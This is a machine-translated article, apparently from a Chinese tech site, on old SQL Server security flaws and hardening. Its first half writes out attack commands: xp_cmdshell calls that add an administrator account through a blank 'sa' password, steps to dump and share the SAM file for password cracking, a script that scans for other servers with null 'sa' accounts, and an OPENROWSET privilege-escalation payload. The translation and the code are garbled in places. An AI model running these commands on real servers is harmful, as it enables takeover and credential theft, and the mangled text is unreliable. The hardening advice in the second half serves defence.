Some security issues with SQL Server

Currently on the NT Server intrusion, there are many ways, such as the use of IIS vulnerabilities, but you do not know that there is no, in fact, with the NT Server associated with the SQL database server example is a very proportional means. Herbless intrusion of some sites, such as legoland.co.uk site is through the intrusion of SQL Server to gain control of the system and destroyed. So the protection of SQL Server is essential, here I have some loopholes for you to refer to. --------------------------------------------------------------let's look at the network protocol libraries supported by SQL Server:--------------------------- -----------------------------------| SQL Server Receptacle Kyoto Libraries |--------------------------------------------------------------| Kyoto library| Possible Vulnerabilities | Encrypt |--------------------------------------------------------------| Named Pipes | --Use NT SMB ports (tcp139,udp137, | no | | (Famous pipe) | 138) To communicate, these can be through | | | Firewall control, but if the internal network can | | | | Casual access is also a small defect | | --User name, password and data not added | | | Transmission, anyone can come through sniffer | | | Data capture. | |--------------------------------------------------------------| IP Sockets | --Open 1433 by default, you can use | No | | | Scanner to view this port. | Data can be intercepted by sniffer. | |--------------------------------------------------------------| Multi-Protocol | --The client needs to support NT RPCs; is | | | Kind of environment may cause problems. | --Using TC by defaultP random port, but | | | Firewall Port map fixed implementation (Reference | | | | Look at KB Q164667). | --need to pay attention to the choice of encryption options, the default | | | | This option is not selected. | |--------------------------------------------------------------| NWLink | --there is the risk of interception of data by sniffer | No |--------------------------------------------------------------| AppleTalk (ADSP) | --there is the risk of interception of data by sniffer | No |--------------------------------------------------------------| Banyan Vines | --there is the risk of interception of data by sniffer | No |--------------------------------------------------------------general recommended use is: If you can use named on integrated (NT) security Pipes or multi-protocol, then you use these protocol libraries, and if possible, try to use multi-protocol and enabling encryption options. If you do not use the above, then use the IP Sockets protocol, and change its default port and check the system at any time to ensure that no sniffer exists. Also, consider using a Web service or COM component as the business object layer for your application, and use a secure channel (secure channel) in the middle tier and SQL Server programs. There are a number of third-party products that can encrypt this communication. ---------------------------------------------------------------------below to explain the various security patterns of SQL Server and how they work? Security mode defines how some SQL Server can authenticate users who want to use their services, see the following security mode for SQL Server 6.5 and the SQL Server 7.0 made some descriptions and differences of the change:-----------------------------------------------------------------| Safe mode| SQL Server 6.5 | SQL Server 7.0 Change Place |-----------------------------------------------------------------| Standard | --Login definition in SQL Server | --Separate standard mode in SQL Server| | Standard Mode | And given the password. | No use. | --sql server's login account with | | | | Windows NT Separate | |-----------------------------------------------------------------| Integrated |-using Security Manager SQL's Ledger | --become "Windows NT only" here | | Integrated Model | Households. | Mode. |-user connected to SQL server| --only works under NT system, not in Win9x | | | Does not require a specific separate login and | Support. | Password. |-passwords are never stored in applications | --can be directly integrated into NT groups for easy | | | , not in plaintext in the network | Management, (note there is a builtin group in | | | Transmission. | Generated on the local system). || |-sql server can use NT's | | | | Authentication methods to authenticate users and | | | Can be used, such as account expiration. |-need named pipe or multi-| | | | Kyoto Library. | |------------------------------------------------------------------| Mixed |-Provide some special for the way above | --Become SQL Server and Windows NT | | Mixed Way | Levy but there is a retreat to the thing is the customer | Mode. | A trusted connection cannot be established on the end. | --Try to use window NT only mode | |------------------------------------------------------------------login is just the first step, once the user logs in, The user must access the independent database, for the above to be established, there must be a table in the sysusers to the user of each database. So be safe. Please be aware that there is a "guest" account in your database and that you will not give certainPeople to access your database. Detailed you can refer to Microsoft's site: http://www.microsoft.com/technet/SQL/Technote/ Secure.asp-------------------------------------------------------------------Some security issues with SQL Server: There are "sa" accounts, The password is empty and the password is a member of the SQL Server security module, and we can use the xp_cmdshell stored procedure (extended stored procedure) for command operations, such as: xp_cmdshell "NET user testuser Ugothacked/add "Then in: xp_cmdshell" net localgroup Administrators Testuser/add "The attacker succeeded in adding a user to SQL Server. Of course, remote, generally need to have 1433 open, through the MySQL client connection. Of course, you can also use: xp_cmdshell "rdisk/s-" method, so that the \winnt\repair directory to reconstruct the information without prompting the user. Then, after Sam Backup, an attacker can establish an SMB connection to a share or establish a connection: xp_cmdshell "net share Getsam=c:\winnt\repair" uses the share to get the file and then runs with L0phtCrack. If the SMB port is controlled by a firewall or shuts down, an attacker can also copy sam._ files to the Web directory for anonymous browser downloads. If someone does not have IIS, why don't you use TFTP:. OK, through this controlled SQL Server server, an attacker can use it to find other machines within the network to expand their gains, and here is an SQL script that lists other SQL Servers in the network with empty account ' sa ' Example:---------------------------------------------------------------------Create temp table to store enumerated Servers SET NOCOUNT on CREATE TABLE #temp (shelldump varchar (255)) INSERT #temp EXEC xp_cmdshell ' osql-l ' DeclaRE @current_server varchar (255), @conn_string varchar 255 DECLARE sql_cursor for SELECT * from #temp OPEN cursor or FETCH NEXT from Sql_cursor to @current_server Loop through potential targets and check for null SA accounts If target is vulnerable, version information'll be displayedwhile @ @FETCH_STATUS = 0 BEGIN If @current_server <> ' Servers: ' BEGIN Select @current_server = RTrim (LTrim (@current_server)) Select @conn_string = ' exec xp_cmdshell ' osql-s ' + @curre Nt_server + '-usa-p-Q ' SELECT @ @version ' ' PRINT ' attempting connection to server: ' + @current_server EXECUTE (@conn_ String) PRINT ' ===================================================================== ' End FETCH NEXT from Sql_cursor Into @current_server end clean up close sql_cursor deallocate sql_cursordrop TABLE # TEMP--------------------------------------------------------------------Of course some people may also close xp_cmdshell extended stored Procedure (Extended stored procedures), we can also use the following methods: Xp_regread ' HKEY_LOCAL_MACHINE ', ' security\sam\dOmains\account ', ' F ' if the MSSQLServer service is running under the Local System account and if SYSKEY is not installed on the system, the above call can return the encrypted password or SID in the registry. ------------------------------------------------------------------------another loophole, is about hoc heterogenous queries For the promotion of rights, see the following Microsoft Description: http://www.microsoft.com/technet/security/bulletin/ Fq00-014.asp about the above vulnerabilities, you can use the following xploit to get a promotion of rights: SELECT * from OPENROWSET (' SQLOLEDB ', ' Trusted_connection=yes;data source= MyServer ', ' SET fmtonly off execute master. xp_cmdshell "dir c:\" "This is one of the more like you can execute other orders, you think. -------------------------------------------------------------------------There is a recent loophole: Extended Stored Procedure Parameter parsing (extended stored procedure parameter resolution) vulnerability, detailed information at this URL is introduced: http://www.microsoft.com/technet/security/bulletin/ms00-092.asp. The main problem is to provide an API function Srv_paraminfo () in MSD, which is used to extend a stored procedure call to explain in-depth parameters such as: exec < stored procedure name > < parameter 1>, < parameter 2> To query the "C:\Winnt" directory tree, you can express the following: Exec xp_dirtree ' c:\winnt ' but without checking the length of each parameter, passing a fairly long string, there is the possibility of overwriting other stack parameters that can cause a buffer overflow. The process that is known now is as follows: The affected extended stored procedures are currently available: 1, xp_peekqueue (xpqueue.dll) xp_printstatements (Xprepl.dll) passes a very long word to the first parameterThe string overrides the return address saved by the exception handler. 2, Xp_proxiedmetadata (xprepl.dll) The stored procedure uses 4 parameters. Passing an unusually long string to the second parameter overrides the return address saved by the exception handler. 3, Xp_setsqlsecurity (xpstar.dll) The stored procedure uses 4 parameters. Passing an extra long string to the third parameter causes the entire SQL Server process to terminate immediately. 4. XP_DISPLAYPARAMSTMT (Xprepl.dll) xp_enumresultset (Xprepl.dll) xp_showcolv (Xprepl.dll) XP_UPDATECOLVBM (xprepl.dll Passing an extremely long string to the first argument will result in an illegal operation and overwrite the return address saved by the exception handler. Here's a tricky thing to say, if you want to know that these extended stored procedures call that DLL file, you can do the following, such as: Select O.name,c.text from dbo.syscomments C, dbo.sysobjects o where C.id = o.id and o.name = ' xp_peekqueue ' So you can get the DLL that calls the extended stored procedure, and if Microsoft doesn't have a patch, you're going to change the DLL file for the time being, and of course some DLL files call several extended stored procedures, Cannot be blindly changed, otherwise you will not be able to use, you need to use the following actions to know the DLL calls those extended stored procedures: Select O.name,c.text from dbo.syscomments C, dbo.sysobjects o where C.id = o.id and C.text = ' Xpqueue.dll ' Fortunately Microsoft out of the patch, you can go to the place below to find, not one to find the DLL program, hehe: Http://support.microsoft.com/support/sql /xp_security.asp this vulnerability @stake discover and provide demo test code that you can find here: http://www.atstake.com/research/advisories/2000/ SQLADV2-POC.C------------------------------------------------------------------------OK, of course SQL Server has some other vulnerabilities, Relatively slight, asISS found administrator login ID stored in the registry, its encryption method is relatively simple, easy to obtain, in detail, see: Http://xforce.iss.net/alerts/advise45.php3. We can look elsewhere. -------------------------------------------------------------------Some security recommendations for SQL Server systems: Make sure you have the latest security patches, as follows: Windows NT 4.0-service Pack 6aSQL Server 6.5-service Pack 5aSQL Server 7.0-service Pack 2. (Various Hotfixes-check http://www.microsoft.com/download) SQL Server 2000-hotfix S80233i.exe (Intel) Of course, everyone should keep an eye on Microsoft's security bulletin. Do not use port 1433 in the IP sockets, if you use multi-protocol also modify the port. Do not embed the ' sa ' password in any application such as Vb/delphi apps, or in a Global.asa file, because "sa" is a default password for SQL Server that is similar to the Administrator account in the Windows NT system and has a blank password. Change the password for the ' sa ' and ' probe ' account. Ensure that SQL Server errors are logged on the NTFS system. If you do not need xp_cmdshell (use sp_dropextendedproc ' xp_cmdshell '), do not leave xp_cmdshell extended stored proc (extended stored procedures) on the server. Enter in any isql window: Use Mastersp_dropextendedproc ' xp_cmdshell ' discards unwanted ole automatic stored procedures, and of course some features in Enterprise Manager are not available. These processes include the following: sp_OACreate sp_OADestroy sp_oageterrorinfo sp_oagetproperty sp_OAMethod sp_OASetProperty Oastop Remove unwanted registry access procedures as follows: Xp_regaddmultistring Xp_regdeleTekey xp_regdeletevalue xp_regenumvalues xp_regread xp_regremovemultistring Remove other system stored procedures, if you think you still have a threat, Of course, be careful with drop these processes, you can test on the test machine to ensure that your normal system can complete the work, these processes include: sp_bindsession sp_cursor sp_cursorclosesp_cursorfetch sp_ CursorOpen sp_cursoroptionsp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbytesp_oacreate Sp_OADestroy sp_ Oageterrorinfosp_oagetproperty sp_OAMethod sp_oasetpropertysp_oastop sp_replcmds sp_replcounterssp_repldone sp_ Replflush Sp_replstatussp_repltrans sp_sdidebug Xp_availablemediaxp_cmdshell xp_deletemail xp_dirtree Xp_dsninfo xp_enumdsnxp_enumerrorlogs xp_enumgroups xp_enumqueuedtasksxp_eventlog xp_findnextmsg xp_fixeddrivesxp_ Getfiledetails xp_getnetname xp_grantloginxp_logevent xp_loginconfig xp_logininfoxp_makewebtask xp_msver Perfendxp_perfmonitor xp_perfsample xp_perfstartxp_readerrorlog xp_readmail xp_revokeloginxp_runwebtask xp_ Schedulersignal xp_sendmailxp_servicecontrol xp_snmp_getstate xp_snmp_raisetrapxp_sprintf xp_sqlinventory xp_ Sqlregisterxp_sqltrace xp_sscanf xp_startmailxp_stopmail xp_subdirs xp_unc_to_drive removes the guest user from the database. Turn off SQL Mail compatibility to prevent the transmission of some Trojan virus and so on. Set up a task to run the following program periodically: findstr/c: "Login Failed" \mssql7\log\*.* "redirect to other files or mail to admin mailbox." Frequently check for an account with a blank password: Use masterselect name,passwordfrom sysloginswhere password be nullorder by name to check all not needed ' sa ' Permissions stored procedures and extended stored procedure access rights: Use Masterselect sysobjects.namefrom sysobjects, sysprotectswhere sysprotects.uid = 0AND xtype in (' X ', ' P ') and sysobjects.id = Sysprotects.idorder by name guarantees that the transport information for SQL Server is in an isolated network segment. The responsible editor Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 give force (0 votes) to be tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) passing (0 Votes) The original text: Some security questions about SQL Server back to network security home